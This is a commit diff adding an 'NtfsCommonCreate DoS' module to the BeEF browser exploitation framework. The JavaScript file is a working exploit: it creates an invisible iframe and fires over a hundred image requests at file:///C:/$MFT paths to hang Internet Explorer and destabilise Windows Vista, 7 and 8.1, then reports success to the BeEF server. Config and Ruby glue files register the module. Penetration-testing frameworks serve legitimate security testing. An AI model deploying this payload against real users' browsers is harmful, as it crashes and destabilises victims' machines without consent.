Add NtfsCommonCreate DoS module

modules/exploits/ntfscommoncreate_dos/command.js

@@ -0,0 +1,21 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var dom = beef.dom.createInvisibleIframe();
+  var num_images = 100;
+
+  beef.debug('[NtfsCommonCreate DoS] Initiating ' + num_images + ' requests to $MFT...');
+  for (var i = 0; i <= num_images; i++) {
+    var path = 'C:/$MFT/' + Math.random().toString(36).substring(2,10);
+    var img = new Image;
+    img.src = 'file:///' + path;
+    dom.appendChild(img);
+  }
+
+  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DoS request sent');
+});
+

modules/exploits/ntfscommoncreate_dos/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ntfscommoncreate_dos:
+            enable: true
+            category: "Exploits"
+            name: "NtfsCommonCreate DoS"
+            description: "This module attempts to hang the browser and cause system instability by abusing a flaw in <a href='http://securitytracker.com/id/1038575'>NtfsCommonCreate</a>. Affects Microsoft Windows Vista, 7 and 8.1."
+            authors: ["bcoles", "anatolymik"]
+            target:
+                working: ["IE"]

modules/exploits/ntfscommoncreate_dos/module.rb

@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ntfscommoncreate_dos < BeEF::Core::Command
+  def self.options
+    return []
+  end
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end